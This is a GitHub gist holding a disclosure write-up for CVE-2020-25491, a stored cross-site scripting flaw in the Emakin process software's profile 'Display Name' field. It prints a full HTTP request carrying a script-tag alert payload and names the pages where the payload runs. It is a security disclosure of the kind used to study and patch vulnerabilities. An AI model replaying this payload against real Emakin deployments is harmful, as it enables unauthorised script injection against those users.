Skip to content

Instantly share code, notes, and snippets.

@mhmtayberk

mhmtayberk/CVE-2020-25491.md Secret

Last active December 6, 2021 23:43
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mhmtayberk/969add4b6c77f122a3a3a0cb00e2975b to your computer and use it in GitHub Desktop.
Save mhmtayberk/969add4b6c77f122a3a3a0cb00e2975b to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2020-25491
Raw
CVE-2020-25491.md

What is Emakin?

Emakin is Process Improvement, Teamwork, Mobility, Compatibility, Safety and Security, Reduced Costs, Higher Revenue, Single Platform software for Businesses.

Companies using Emakin include VakıfBank, Ülker, Katılım Emeklilik, Sabancı, Aegon, Eczacıbaşı, Godiva, Tarsim, A101, Near East Bank and various other institutions.

Based on the companies using Emakin, we can say that the software is used extensively in the Turkey.

What is CVE-2020-25491?

CVE-2020-25491 is a basic Stored XSS. The vulnerability is simple.

The "Display Name" field in the profile editing area (https://vulnerable.com/app/#/profile) in the top menu is affected by the related vulnerability.

Request:

POST /rpc/membership/setProfile HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 807
Origin: https://vulnerable.com
Connection: close
Referer: https://vulnerable.com/app/
Cookie: _fbp=fb.2.1598889391208.495488426; cultPref=en-US; cookieToken=D5D4DB9DB3DAD8D77D8C522DCF252136F15DAA85C5F217D42F34EAB79E6F30D346CE7128F84A53911E9E81B947E4ED4D2384F649CDCE2ED20FC53ED1E6CAC816977884D841DD7EAAA9C378E9CB37F51103E7A42B; AKOpenAuth=C52389963AF70A290721BC7C7B4BE9F062152850C92C5C9B48AB80ED00EFCCF074D63D56C2C340EC61802827BEAFF995; .ASPXAUTH=5F48AA8100055D6A13A71418D07796D507B770DA1FD64EC7BBBF367E464FD06A585C11D72EB6383F6E05465862E7025FA37498078450FB797AC4E2EC0DDA1BC99FB0E76B389F78F64F3DA853290CFE4D124E9BAE40F0F231C1C61756483B5A0E7645D713181693BBF1927933791D5D0EBAF52FE1A30A1829E6B7DF795152E333F85719315F606AE9383EF427CC842F1D4B15D12D178108E332CE7387AC74EE932B0300853BF62B000BC321A49B28CDD983D70DABFB45E1565DAD7068FC6C4CD201EE40171A31694C554F0470206EEC1DA1A505D0

{"profile":"<UserProfile><Properties><Name/><Surname/><DisplayName>&lt;script&gt;alert('1337')&lt;/script&gt;</DisplayName><EMailAddress>mail@vulnerable.com</EMailAddress><Language Caption=\"English (American Samoa)\">en-AS</Language><DateFormat Caption=\"Auto Format\"/><Theme Caption=\"Default\"/></Properties><DomainTheme>Blocks</DomainTheme><Themes><Theme>Blocks</Theme><Theme>Blue</Theme><Theme>Clean</Theme><Theme>Sun</Theme></Themes><Ticket>E52FEF99EB0C4A5FED7AE7AF917040A732C0C69182F331CBC4D0F3F0689246AB1E61492A11C75F61E0989CA9B09E553E7FBA7E7F850D9F872E5FE3BCAFC38359C3E01C53D8E83D2FABE270455C200866182ADDBA</Ticket><Logons><Logon><Provider>Organization</Provider></Logon><Logon><Provider>LDAP</Provider></Logon></Logons><ImageFile Caption=\"\" Url=\"\"/><ImageUrl/></UserProfile>"}

You can see the payload is: <script>alert('1337')</script>

Then you can see that the vulnerability is triggered on the Activity Stream (https://vulnerable.com/app/#/activitystream) and Work Item (https://vulnerable.com/app/#/workitem/WorkItemId) pages.

For more details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-25491

For more blogposts: https://ayberk.ninja/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment